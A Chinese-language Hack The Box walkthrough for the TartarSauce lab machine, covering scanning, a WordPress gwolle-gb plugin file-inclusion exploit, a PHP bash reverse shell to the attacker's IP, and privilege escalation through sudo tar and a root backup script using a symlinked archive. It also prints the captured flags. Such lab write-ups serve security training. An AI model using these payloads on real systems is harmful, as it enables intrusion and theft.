Hackthebox - TartarSauce

靶场信息

靶场类型

信息收集

Nmap

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 10000 10.10.10.88
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-11 20:30 CST
Warning: 10.10.10.88 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.88
Host is up (0.095s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-title: Landing Page
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/11%OT=80%CT=1%CU=43534%PV=Y%DS=2%DC=T%G=Y%TM=63E78A9
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=A)SEQ
OS:(SP=108%GCD=1%ISR=10D%TI=Z%II=I%TS=A)OPS(O1=M537ST11NW7%O2=M537ST11NW7%O
OS:3=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST11NW7%O6=M537ST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M537NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   117.74 ms 10.10.16.1
2   74.70 ms  10.10.10.88

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.31 seconds

Http

这什么玩意儿,虽然知道是字符组成的图案,但是我确实看不出来是啥

<!--Carry on, nothing to see here :D-->

源代码拉到最底下,有一句这里没什么好看的,挺皮的

/webservices/tar/tar/source/ 
/webservices/monstra-3.0.4/
/webservices/easy-file-uploader/ 
/webservices/developmental/
/webservices/phpmyadmin/

在 nmap 扫描的时候,有几个目录,挨个去看一下

http://10.10.10.88/webservices/monstra-3.0.4/ 然后只有这一个地址可以访问

┌──(root㉿kali)-[~/Desktop]
└─# searchsploit monstra 3.0.4    
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                   |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upload / Remote Code Execution                                                                                                | php/webapps/43348.txt
Monstra CMS 3.0.4 - Arbitrary Folder Deletion                                                                                                                                    | php/webapps/44512.txt
Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload                                                                                                                          | php/webapps/48479.txt
Monstra cms 3.0.4 - Persitent Cross-Site Scripting                                                                                                                               | php/webapps/44502.txt
Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)                                                                                                                        | php/webapps/49949.py
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)                                                                                                                                   | php/webapps/44855.py
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)                                                                                                                                   | php/webapps/44646.txt
Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)                                                                                                               | php/webapps/45164.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

这个版本的 Monstra CMS 确实是可以搜索到漏洞,这个先不急着看

点击首页的登录,可以进入登录页面

弱口令 admin/admin 成功登录

根据我们找到的几个漏洞,其中一个为文件上传,我 exploit 利用没成功,我去手动试试

点击 Dashboard -> upload file -> select file -> upload

这里利用没有成功,我又琢磨了一阵,发现是个兔子洞

Fuzz

┌──(root㉿kali)-[~/Desktop]
└─# ffuf -u "http://10.10.10.88/webservices/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.88/webservices/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

wp                      [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 93ms]
                        [Status: 403, Size: 298, Words: 22, Lines: 12, Duration: 75ms]
:: Progress: [30000/30000] :: Job [1/1] :: 219 req/sec :: Duration: [0:00:26] :: Errors: 2 ::

这里发现有个 wp

但是没有页面

尝试访问 http://10.10.10.88/webservices/wp/wp-admin/ 的时候,跳转到了 tartarsauce.htb ,去加入一个 hosts 解析

echo 10.10.10.88 tartarsauce.htb >> /etc/hosts

然后再访问就有页面了,咱们去访问一下 wp-admin 页面

成功找到后台,这个时候去使用 wpscan 扫描一下

Wpscan

┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url http://10.10.10.88/webservices/wp/ --enumerate p --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.10.88/webservices/wp/ [10.10.10.88]
[+] Started: Sat Feb 11 21:10:03 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.88/webservices/wp/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.10.88/webservices/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.88/webservices/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.10.10.88/webservices/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.10.10.88/webservices/wp/, Match: 'WordPress 4.9.4'

[i] The main theme could not be detected.

[+] Enumerating Most Popular Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:50 <=================================================================================================================================> (1500 / 1500) 100.00% Time: 00:00:50
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
 | Last Updated: 2022-12-01T17:18:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.0.2
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.0.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt

[+] gwolle-gb
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
 | Last Updated: 2023-01-24T11:28:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | [!] The version is out of date, the latest version is 4.5.0
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/, status: 200
 |
 | Version: 2.3.10 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Feb 11 21:10:56 2023
[+] Requests Done: 1511
[+] Cached Requests: 31
[+] Data Sent: 449.789 KB
[+] Data Received: 272.615 KB
[+] Memory used: 194.531 MB
[+] Elapsed time: 00:00:53

可以得知 wordpress 版本是 4.9.,并且有一个 Gwolle 插件,切在插件的 readme 页面中有说明版本号为 1.5.3

https://www.exploit-db.com/exploits/38861

根据描述,找到了一个漏洞

漏洞利用

根据漏洞中的描述,我们来构造一下 exploit

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.6/

上面是我们之后要运行的内容

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.6/4444 0>&1'") ?>

上面是我们的 exploit 请求的 shell 文件的内容,文件名字为 wp-load.php

┌──(root㉿kali)-[~/Desktop]
└─# python3 -m http.server 80                                                             
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

接着使用 python3 运行一个 http 服务器

nc -nvlp 4444

接着使用 nc 监听一个端口

最后去执行我们的 exploit

┌──(root㉿kali)-[~/Desktop]
└─# rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.88] 33670
bash: cannot set terminal process group (1261): Inappropriate ioctl for device
bash: no job control in this shell
</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ whoami&&id
whoami&&id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

成功返回 shell

权限提升

User

</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ sudo -l
sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar

使用 sudo -l 可以看到,我们可以使用 onuma 权限执行 /bin/tar

https://gtfobins.github.io/gtfobins/tar/

sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
whoami&&id
onuma
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)

成功提权到 user 权限

cat user.txt
140682a65dccf6fbd674edb57692ae4c

成功拿到 user 权限的 flag 文件

Root

2023/02/11 08:40:29 CMD: UID=0     PID=3580   | /bin/bash /usr/sbin/backuperer 

运行 pspy 可以看到,会定时以 root 权限执行 /usr/sbin/backuperer 这个文件,去查看一下

file /usr/sbin/backuperer 
/usr/sbin/backuperer: Bourne-Again shell script, UTF-8 Unicode text executable

cat /usr/sbin/backuperer 
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

脚本分析

生成工作目录和随机临时文件名
打印标题
生成测试消息
清理
将用户上下文更改为 onuma 并将 /var/www/html 备份到临时文件中
睡 30 秒
创建用于完整性检查的目录
unatar 新建文件到check目录
执行 diff 以检查存档和文件系统之间的差异
如果没有差异清理并保存新创建的存档,备份旧的
否则将所有差异记录到日志文件

利用

使用 www-data 用户在 /var/www/html 下创建空文件

</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ cd /var/www/html
cd /var/www/html
www-data@TartarSauce:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@TartarSauce:/var/www/html$ touch 1
touch 1

使用 onuma 用户在 /var/tmp 下创建 var/www/html/ 结构,将 /root/root.txt 链接到 1

cd /var/tmp
pwd
/var/tmp
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
mkdir -p var/www/html
cd var/www/html
ln -s /root/root.txt 1
ls -la
total 8
drwxr-xr-x 2 onuma onuma 4096 Feb 11 09:06 .
drwxr-xr-x 3 onuma onuma 4096 Feb 11 09:05 ..
lrwxrwxrwx 1 onuma onuma   14 Feb 11 09:06 1 -> /root/root.txt

在 /var/tmp 中创建 tar 存档

cd /var/tmp
/bin/tar -zcvf a.tgz var/www/html
var/www/html/
var/www/html/1

等待脚本执行,并在 30 秒内将 a.tgz 复制到临时存档

ls -la
total 112
drwxrwxrwt 11 root  root   4096 Feb 11 09:10 .
drwxr-xr-x 14 root  root   4096 May 12  2022 ..
-rw-r--r--  1 onuma onuma 65536 Feb 11 09:10 .816e92e4f61e2b8dce68f5779ed42ad70a562348
-rw-r--r--  1 onuma onuma   154 Feb 11 09:08 a.tgz
drwxr-xr-x  3 onuma onuma  4096 Feb 11 09:05 var
cp a.tgz .816e92e4f61e2b8dce68f5779ed42ad70a562348

等待检查完成

检查 /var/backups 下的日志文件 onuma_backup_error.txt,因为它将包含来自 /var/www/html 和 a.tgz 存档的文件之间的查意,即 /root/root.txt 的内容

cat /var/backups/onuma_backup_error.txt
...
------------------------------------------------------------------------
Integrity Check Error in backup last ran :  Thu Jan 21 05:38:54 EST 2021
------------------------------------------------------------------------
/var/tmp/.379fe8e77f9f84a66b9a6df9a452d10499713829
Binary files /var/www/html/webservices/wp/.wp-config.php.swp and /var/tmp/check/var/www/html/webservices/wp/.wp-config.php.swp differ
------------------------------------------------------------------------
Integrity Check Error in backup last ran :  Sat Feb 11 09:11:14 EST 2023
------------------------------------------------------------------------
/var/tmp/.816e92e4f61e2b8dce68f5779ed42ad70a562348
diff -r /var/www/html/1 /var/tmp/check/var/www/html/1
0a1
> 2066572c29f0ffd2a77ee5e5c2e77703

成功拿到 root 权限的 flag 文件